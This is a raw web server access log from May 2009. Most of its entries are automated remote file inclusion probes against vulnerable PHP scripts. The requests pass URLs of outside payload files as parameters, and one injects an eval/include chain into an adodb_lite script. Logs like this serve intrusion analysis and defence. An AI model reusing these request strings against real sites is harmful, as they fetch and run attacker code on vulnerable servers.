72.30.142.126 - - [12/May/2009:00:00:25 -0400] "GET /logs/access_log.Q109012500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.143.98.5 - - [12/May/2009:00:00:38 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:00:38 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:00:38 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:00:40 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:00:40 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:00:40 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:00:41 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:00:41 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:00:41 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
66.249.72.114 - - [12/May/2009:00:00:54 -0400] "GET /logs/error_log.Q107052100 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
190.144.44.36 - - [12/May/2009:00:01:08 -0400] "GET /logs/access_log.Q109041500%20%20//admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:01:09 -0400] "GET /logs/access_log.Q109041100%20%20//admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.90.108.20 - - [12/May/2009:00:01:25 -0400] "GET /logs/access_log.Q108100900//skin/zero_vote/ask_password.php?dir=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
69.90.108.20 - - [12/May/2009:00:01:26 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
69.90.108.20 - - [12/May/2009:00:01:26 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:01:35 -0400] "GET /logs/error_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:01:37 -0400] "GET /logs/error_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:01:38 -0400] "GET /logs/error_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
85.214.94.23 - - [12/May/2009:00:01:52 -0400] "GET /logs/access_log.Q108110100//trans/trans.php?trans=fr&page=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:00:02:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.126 - - [12/May/2009:00:02:25 -0400] "GET /logs/access_log.Q107052100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
190.144.44.36 - - [12/May/2009:00:02:35 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.214.94.23 - - [12/May/2009:00:02:37 -0400] "GET /logs/access_log.Q108102400//trans/trans.php?trans=fr&page=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:00:03:12 -0400] "GET /logs/error_log.Q109041600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.143.98.5 - - [12/May/2009:00:03:25 -0400] "GET /logs/access_log.Q108100900%20///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:03:27 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
123.143.98.5 - - [12/May/2009:00:03:27 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
123.143.98.5 - - [12/May/2009:00:03:27 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
123.143.98.5 - - [12/May/2009:00:03:28 -0400] "GET /logs/access_log.Q108100900%20///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:00:03:32 -0400] "GET /logs/access_log.Q108100900%20///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
123.125.64.38 - - [12/May/2009:00:03:37 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.143.98.5 - - [12/May/2009:00:04:52 -0400] "GET /logs/error_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.162.115.67 - - [12/May/2009:00:05:29 -0400] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.cerigua.org/cp/scripts/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
72.30.142.126 - - [12/May/2009:00:06:58 -0400] "GET /logs/error_log.Q109040200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/May/2009:00:07:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.110.19.178 - - [12/May/2009:00:07:43 -0400] "GET /logs//error.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
211.110.19.178 - - [12/May/2009:00:07:43 -0400] "GET //error.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
211.110.19.178 - - [12/May/2009:00:07:43 -0400] "GET /logs/access_log.Q108092600//error.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
72.30.142.126 - - [12/May/2009:00:07:55 -0400] "GET /logs/error_log.Q107082800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.150.79.146 - - [12/May/2009:00:07:59 -0400] "GET /logs/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:07:59 -0400] "GET /components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:07:59 -0400] "GET /logs/access_log.Q108122800/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:08:13 -0400] "GET /logs/access_log.Q108082700//admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:08:13 -0400] "GET /logs/access_log.Q109012500//admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
220.79.47.122 - - [12/May/2009:00:08:26 -0400] "GET /logs///vwar/backup/errors.php?error=http://culinaria.brandao.eti.br/cms//uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.79.47.122 - - [12/May/2009:00:08:26 -0400] "GET /logs/access_log.Q108081700///vwar/backup/errors.php?error=http://culinaria.brandao.eti.br/cms//uiu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
220.79.47.122 - - [12/May/2009:00:08:26 -0400] "GET ///vwar/backup/errors.php?error=http://culinaria.brandao.eti.br/cms//uiu.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.110.19.178 - - [12/May/2009:00:08:31 -0400] "GET /logs/access_log.Q108072300//error.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
220.79.47.122 - - [12/May/2009:00:08:58 -0400] "GET /logs/access_log.Q108061300///vwar/backup/errors.php?error=http://culinaria.brandao.eti.br/cms//uiu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.253.162.6 - - [12/May/2009:00:10:25 -0400] "GET /scripts/browser_ee.js//?id=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/safe1.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.808"
87.253.162.6 - - [12/May/2009:00:10:25 -0400] "GET //?id=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/safe1.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.808"
87.253.162.6 - - [12/May/2009:00:10:25 -0400] "GET /scripts//?id=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/safe1.txt??? HTTP/1.1" 200 810 "-" "libwww-perl/5.808"
220.79.47.122 - - [12/May/2009:00:10:42 -0400] "GET ///vwar/backup/errors.php?error=http://culinaria.brandao.eti.br/cms//uiu.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
220.79.47.122 - - [12/May/2009:00:10:42 -0400] "GET /logs///vwar/backup/errors.php?error=http://culinaria.brandao.eti.br/cms//uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.79.47.122 - - [12/May/2009:00:10:42 -0400] "GET /logs/access_log.Q108081700///vwar/backup/errors.php?error=http://culinaria.brandao.eti.br/cms//uiu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:00:11:09 -0400] "GET /logs/error_log.Q107120900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.79.47.122 - - [12/May/2009:00:11:10 -0400] "GET /logs/access_log.Q108061300///vwar/backup/errors.php?error=http://culinaria.brandao.eti.br/cms//uiu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:00:11:39 -0400] "GET /logs/error_log.Q109012200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.118.194.200 - - [12/May/2009:00:11:46 -0400] "GET //error.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
210.118.194.200 - - [12/May/2009:00:11:46 -0400] "GET /logs//error.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
210.118.194.200 - - [12/May/2009:00:11:49 -0400] "GET /logs/access_log.Q108092600//error.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
209.59.12.99 - - [12/May/2009:00:12:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [12/May/2009:00:12:34 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:12:34 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:12:34 -0400] "GET /logs/access_log.Q108081700//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.65.46.233 - - [12/May/2009:00:14:29 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://home.sunchon.ac.kr/%7Echeskor//technote/image/userimage/img/image?? HTTP/1.1" 404 222 "-" "libwww-perl/5.810"
210.118.194.200 - - [12/May/2009:00:14:30 -0400] "GET /logs/access_log.Q108072300//error.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
91.205.124.4 - - [12/May/2009:00:14:42 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
91.205.124.4 - - [12/May/2009:00:14:42 -0400] "GET / HTTP/1.1" 200 409 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
121.165.73.157 - - [12/May/2009:00:15:07 -0400] "GET //index.php?DOCUMENT_ROOT=http://capoul.raid.free.fr/phpRaid/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.165.73.157 - - [12/May/2009:00:15:12 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://capoul.raid.free.fr/phpRaid/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [12/May/2009:00:15:12 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://capoul.raid.free.fr/phpRaid/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.163.82.29 - - [12/May/2009:00:15:15 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
121.165.73.157 - - [12/May/2009:00:15:17 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://capoul.raid.free.fr/phpRaid/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:15:37 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:15:37 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:15:37 -0400] "GET /logs/access_log.Q108081700//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
202.163.82.29 - - [12/May/2009:00:15:37 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.91.189.12 - - [12/May/2009:00:15:51 -0400] "GET /logs/access_log.Q108120100////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:15:51 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:15:51 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:15:51 -0400] "GET /logs/access_log.Q108120300////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:15:52 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:15:52 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:15:52 -0400] "GET /logs/access_log.Q108120100////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:15:52 -0400] "GET /logs/access_log.Q108120300////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:15:54 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:15:54 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:15:54 -0400] "GET /logs/access_log.Q108081700//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:16:06 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:16:06 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
69.64.36.105 - - [12/May/2009:00:16:18 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.64.36.105 - - [12/May/2009:00:16:18 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.64.36.105 - - [12/May/2009:00:16:18 -0400] "GET /logs/access_log.Q109041200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:16:32 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:16:32 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
69.64.36.105 - - [12/May/2009:00:16:37 -0400] "GET /logs/access_log.Q108120100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.239.227.155 - - [12/May/2009:00:17:06 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.239.227.155 - - [12/May/2009:00:17:06 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.227.155 - - [12/May/2009:00:17:06 -0400] "GET /logs/access_log.Q108092900//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.239.227.155 - - [12/May/2009:00:17:06 -0400] "GET /logs/access_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:17:07 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:17:07 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:17:07 -0400] "GET /logs/access_log.Q108081700//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:00:17:11 -0400] "GET /logs/access_log.Q107121300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/May/2009:00:17:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.91.189.12 - - [12/May/2009:00:17:45 -0400] "GET /logs/access_log.Q108120100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:17:52 -0400] "GET /logs/access_log.Q108120300%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:00:18:01 -0400] "GET /logs/error_log.Q109041200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.143.109.236 - - [12/May/2009:00:18:06 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:00:18:06 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:00:18:06 -0400] "GET /logs/access_log.Q108100900//modules/vwar/admin/admin.php?vwar_root=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
202.89.33.167 - - [12/May/2009:00:18:34 -0400] "GET /logs/access_log.Q108081700%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.239.227.155 - - [12/May/2009:00:18:36 -0400] "GET /logs/access_log.Q108061100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.239.227.155 - - [12/May/2009:00:18:36 -0400] "GET /logs/error_log.Q108072600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
202.163.82.29 - - [12/May/2009:00:18:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.163.82.29 - - [12/May/2009:00:18:37 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.91.189.12 - - [12/May/2009:00:18:39 -0400] "GET /logs/access_log.Q108120100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:18:40 -0400] "GET /logs/access_log.Q108120300%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:18:43 -0400] "GET /logs/access_log.Q108081700%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:18:46 -0400] "GET /logs/access_log.Q108081700%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
121.165.73.157 - - [12/May/2009:00:18:54 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://capoul.raid.free.fr/phpRaid/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [12/May/2009:00:18:54 -0400] "GET /logs/access_log.Q108072300%20%20//index.php?DOCUMENT_ROOT=http://capoul.raid.free.fr/phpRaid/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:00:18:58 -0400] "GET /logs/access_log.Q107081200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.89.33.167 - - [12/May/2009:00:19:14 -0400] "GET /logs/access_log.Q108061400%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
